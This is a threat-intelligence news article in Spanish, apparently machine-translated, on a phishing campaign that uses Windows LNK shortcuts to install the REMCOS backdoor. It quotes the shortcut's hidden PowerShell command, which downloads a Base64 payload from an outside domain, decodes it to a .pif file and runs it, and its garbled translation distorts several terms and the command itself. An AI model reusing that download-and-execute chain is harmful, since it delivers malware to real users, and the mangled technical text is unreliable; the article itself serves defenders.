En las últimas semanas, los equipos de seguridad cibernética han observado un aumento en las campañas maliciosas que explotan archivos de Windows Acthcut (LNK) para entregar puertas sofisticadas.
Esta nueva ola de ataques disfraza los atajos de LNK como documentos o carpetas inocuas, confiando en el comportamiento predeterminado de Windows de ocultar extensiones de archivos conocidas para engañar a los usuarios.
Una vez ejecutado, el atajo invoca en silencio PowerShell con parámetros de ventana ocultos, obteniendo y decodificando una carga útil Base64 que finalmente instala la puerta trasera REMCOS.
La naturaleza sigilosa de esta cadena, que combina la ingeniería social, los secuencias de comandos sin archivo y los binarios vivos de la tierra, se adhiere a las tácticas evolutivas de los actores de amenazas que se dirigen a entornos empresariales.
Los analistas de Point Wild señalaron que la entrega inicial a menudo llega a través de correos electrónicos de phishing, con archivos adjuntos etiquetados como facturas o documentos de envío.
En otros casos, los actores de amenaza plantan estos atajos maliciosos dentro de los archivos ZIP o RAR en las acciones de la red, contando con navegación casual para activar la ejecución.
Cómo se ve el archivo LNK a un usuario normal (fuente – Point Wild)
Al hacer doble clic, el archivo LNK lanza silenciosamente PowerShell.exe -WindowStyle Hidden -Command (…), lo que le indica a la máquina de la víctima que descargue una carga útil de un servidor remoto.
Investigadores salvajes de Point identificado que el archivo descargado se disfraza con una extensión .gif pero contiene datos binarios codificados en Base64.
La columna vertebral de la campaña es un flujo de trabajo de infección en varias etapas. El script de PowerShell incrustado recupera un recurso de texto codificado, lo escribe a c: \ programaData \ Hew.gif, lo decodifica en un archivo PIF de Windows llamado Chrome.pif a través de (System.Convert) :: FromBase64String, luego ejecuta este binario.
Contenido del archivo LNK (fuente – Point Wild)
El archivo PIF, disfrazado de un programa con temática de Chrome, aprovecha el soporte heredado para atajos de MS-DOS para evitar las advertencias de seguridad modernas. Una vez lanzado, elimina artefactos adicionales, incluidos un atajo de tareas programado y un archivo de URL, para garantizar la persistencia y facilitar una mayor ejecución de la carga útil.
Las evaluaciones de impacto revelan que el Backdoor de REMCOS otorga a los atacantes el control remoto completo sobre los hosts comprometidos.
REMCOS se comunica a través de TCP con un protocolo binario personalizado, habilitando la ejecución de comandos de shell arbitrarios, la transferencia de archivos, el keylogging e incluso la captura de cámara web.
Las víctimas a menudo no se dan cuenta de la violación, ya que el malware almacena registra los registros de pulsación de teclas en C: \ ProgramData \ Remcos \ logs.dat y establece canales encriptados con servidores de comando y control alojados en Europa del Este.
La combinación de ejecución sigilosa y capacidades remotas robustas plantea un riesgo significativo para las redes corporativas, donde el movimiento lateral y la exfiltración de datos pueden seguir el compromiso inicial.
Mecanismo de infección
El mecanismo de infección depende de explotar las propiedades del archivo LNK para cargar comandos maliciosos. A diferencia de las macros de oficina, los archivos LNK no activan advertencias de seguridad macro, lo que permite la ejecución sin sospecha del usuario.
En esta campaña, el campo “objetivo” del LNK está establecido en:-
C: \ Windows \ System32 \ WindowsPowershell \ V1.0 \ Powershell.exe -WindowStyle Hidden -command (new -object System.net.webclient) .downloadfile (‘https://shipping-hr.ro/m/r.txt’,’c:\programdata\\hew.gif’); $ file = “c: \\ ProgramData \\ Hew.gif”; (System.Convert) :: FromBase64String ((Get-Content $ File)) | Set -contento c: \\ programaData \\ chrome.pif -Encoding byte; Iniciar C: \\ ProgramData \\ Chrome.pif
Este comando de una sola línea demuestra la elegancia de los ataques sin archivo: usa System.net.WebClient para obtener el blob base64, luego decodifica y lo ejecuta por completo en la memoria.
Mientras que el flujo de trabajo de infección muestra cómo Windows muestra el icono .lnk engañoso, ocultando la ruta de carga útil real.
Flujo de trabajo de infección (fuente – Point Wild)
Los atacantes ofuscan aún más la detección al incrustar el malware dentro de los flujos de datos alternativos o la elaboración de la ruta del icono para apuntar a DLL maliciosas, desencadenando la ejecución del código cuando Windows intenta representar el icono de acceso directo.
Al armar los archivos LNK, los adversarios evitan muchas protecciones de punto final que se centran en bloques de archivos ejecutables y detecciones macro.
La dependencia de los binarios de sistemas confiables, como PowerShell y CMD, permite al instalador REMCOS evadir las herramientas antivirus basadas en la firma.
Para los defensores, el monitoreo de invocaciones inusuales de PowerShell y conexiones salientes con dominios sospechosos como Shipping-HR.RO es fundamental.
La visibilidad mejorada en las tareas programadas, el uso de anuncios y los archivos .pif recién creados pueden ayudar a identificar y contener esta creciente amenaza.
Integre cualquiera. Pruebe 50 búsquedas de prueba gratuitas
